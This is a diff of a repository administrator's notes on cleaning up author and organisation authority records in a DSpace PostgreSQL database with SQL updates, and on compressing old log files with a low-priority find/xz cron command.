- I generated a new UUID using
uuidgen | tr [A-Z] [a-z]
and set it along with correct name variation for all records:
-dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
+dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
UPDATE 43
- Apparently we also need to normalize Phil Thornton’s names to
Thornton, Philip K.
:
-dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
text_value | authority | confidence
---------------------+--------------------------------------+------------
Thornton, P | 0d8369bb-57f7-4b2f-92aa-af820b183aca | 600
@@ -506,7 +506,7 @@ UPDATE 43
- Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:
-dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
UPDATE 362
- It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)
@@ -520,8 +520,8 @@ UPDATE 362
- Set PostgreSQL’s
shared_buffers
on CGSpace to 10% of system RAM (1200MB)
- Run the following author corrections on CGSpace:
-dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
-dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
+dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
- The authority IDs were different now than when I was looking a few days ago so I had to adjust them here
@@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
Removing the duplicates in OpenRefine and uploading a CSV to DSpace says “no changes detected”
Seems like the only way to sortof clean these up would be to start in SQL:
-dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
+dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
text_value | authority | confidence
-----------------------------------------------+--------------------------------------+------------
International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 | -1
@@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 600
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | -1
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 0
-dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
+dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
UPDATE 1693
-dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
+dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
UPDATE 35
- Work on article for KM4Dev journal
@@ -577,14 +577,14 @@ UPDATE 35
- So basically, new cron jobs for logs should look something like this:
- Find any file named
*.log*
that isn’t dspace.log*
, isn’t already zipped, and is older than one day, and zip it:
-# find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
+# find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
- Since there is
xzgrep
and xzless
we can actually just zip them after one day, why not?!
- We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that
- I use
schedtool -B
and ionice -c2 -n7
to set the CPU scheduling to SCHED_BATCH
and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less
- When the tasks are running you can see that the policies do apply:
-$ schedtool $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}') && ionice -p $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}')
+